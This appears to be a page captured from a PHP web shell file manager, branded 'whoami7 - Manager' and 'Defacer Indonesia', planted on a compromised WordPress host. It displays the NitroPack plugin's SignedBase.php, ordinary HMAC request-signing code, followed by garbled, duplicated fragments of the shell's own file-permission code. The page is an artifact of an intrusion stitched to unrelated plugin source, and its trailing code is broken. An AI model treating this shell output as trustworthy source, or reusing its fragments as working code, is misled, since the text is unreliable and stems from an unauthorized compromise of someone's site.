Asikk-&wkwkwkwkw

whoami7 - Manager

: /home/dataiclx/www/wp-content/plugins/nitropack/nitropack-sdk/NitroPack/SDK/Api/

files >> /home/dataiclx/www/wp-content/plugins/nitropack/nitropack-sdk/NitroPack/SDK/Api/SignedBase.php

 <?php
namespace NitroPack\SDK\Api;
use \NitroPack\Url\Url;

// Src: http://php.net/manual/en/function.hash-equals.php
if(!function_exists('hash_equals')) {
    function hash_equals($str1, $str2) {
        if(strlen($str1) != strlen($str2)) {
            return false;
        } else {
            $res = $str1 ^ $str2;
            $ret = 0;
            for($i = strlen($res) - 1; $i >= 0; $i--) $ret |= ord($res[$i]);
            return !$ret;
        }
    }
}

class SignedBase extends Base {

    private static $signatureHeader = 'X-Nitro-Signature';
    private static $algorithm = 'sha512';

    protected $secret;

    public function __construct($siteId, $siteSecret) {
        parent::__construct($siteId);
        $this->secret = $siteSecret;
    }

    protected function addToBacklog($entry) {
        $entry["siteSecret"] = $this->secret;
        parent::addToBacklog($entry);
    }

    protected function makeRequest($path, $headers = array(), $cookies = array(), $type = 'GET', $bodyData=array(), $async = false, $verifySSL = false) {
        // calculate request signature
        $url = new Url($this->baseUrl . $path);
        $noParamsPath = $url->getPath();
        $params = array();
        if(!is_null($url->getQuery())) {
            parse_str($url->getQuery(), $params);
        }
        $params = $params + $bodyData;
        $headers[SignedBase::$signatureHeader] = static::calculateRequestSignature($noParamsPath, $params, static::getSignatureHeaders($headers), $this->secret);

        // make the request
        $http = parent::makeRequest($path, $headers, $cookies, $type, $bodyData, $async, $verifySSL);

        if ($async) {
            $http->setOnCompleteCallback(array($this, 'verifySignature'));
        } else {
            $this->verifySignature($http);
        }

        return $http;
    }

    protected function verifySignature($http) {
        if ($http->getStatusCode() === ResponseStatus::OK) {
            $responseHeaders = $http->getHeaders();
            if (!isset($responseHeaders[strtolower(SignedBase::$signatureHeader)])) {
                throw new \RuntimeException('Server did not include a signature for a request that was expected to be signed');
            }
            $signature = static::calculateResponseSignature($http->getBody(), static::getSignatureHeaders($responseHeaders), $this->secret);
            if (!hash_equals($signature, $responseHeaders[strtolower(SignedBase::$signatureHeader)])) { // TODO move RemoteConfigFetcher::internal_hash_equals to a place where its accessible everywhere and use it here
                throw new \RuntimeException('Server signature is wrong'); // TODO better message
            }
        }
    }

    /** Signature data:
     * UrlPath|header1:value,header2:value|param1:value,param2:value
     * if not using headers, we still expect their delimiter UrlPath||param1:value,param2:value
     */
    protected static function calculateRequestSignature($urlPath, $parameters, $headers, $secret) {
        // do not include the header that specifies the signature
        if (isset($headers[SignedBase::$signatureHeader])) {
            unset($headers[SignedBase::$signatureHeader]);
        }

        $data = $urlPath;

        ksort($headers);
        $headersTemp = [];
        foreach ($headers as $header => $value) {
            $headersTemp[] = str_replace('-', '_', strtolower($header)) . ':' . $value;
        }

        $data .= '|' . implode(',', $headersTemp);
        $headersTemp = null;

        ksort($parameters);
        $paramsTemp = [];
        foreach ($parameters as $param => $value) {
            if (is_array($value)) {
                $paramsTemp[] = $param . ':' . json_encode($value);
            } else {
                $paramsTemp[] = $param . ':' . $value;
            }
        }

        $data .= '|' . implode(',', $paramsTemp);
        $paramsTemp = null;
        return SignedBase::hmac($data, $secret);
    }

    protected static function getSignatureHeaders($headers) {
        $signatureHeaders = [];
        foreach ($headers as $header => $value) {
            if (stripos($header, 'x-nitro-') !== false && strtolower($header) != strtolower(SignedBase::$signatureHeader)) {
                $signatureHeaders[$header] = $value;
            }
        }

        return $signatureHeaders;
    }

    protected static function calculateResponseSignature($data, $headers, $secret) {
        ksort($headers);
        $headersTemp = [];
        foreach ($headers as $header => $value) {
            $headersTemp[] = str_replace('-', '_', strtolower($header)) . ':' . $value;
        }

        $data = implode(',', $headersTemp) . '|' . $data;
        $headersTemp = null;

        return SignedBase::hmac($data, $secret);
    }

    private static function hmac($data, $secret) {
        return hash_hmac(SignedBase::$algorithm, $data, $secret);
    }

}

Copyright ©2021 || Defacer Indonesia nfo .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?> ?> & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?> ?> )); return $info; } ?> ?>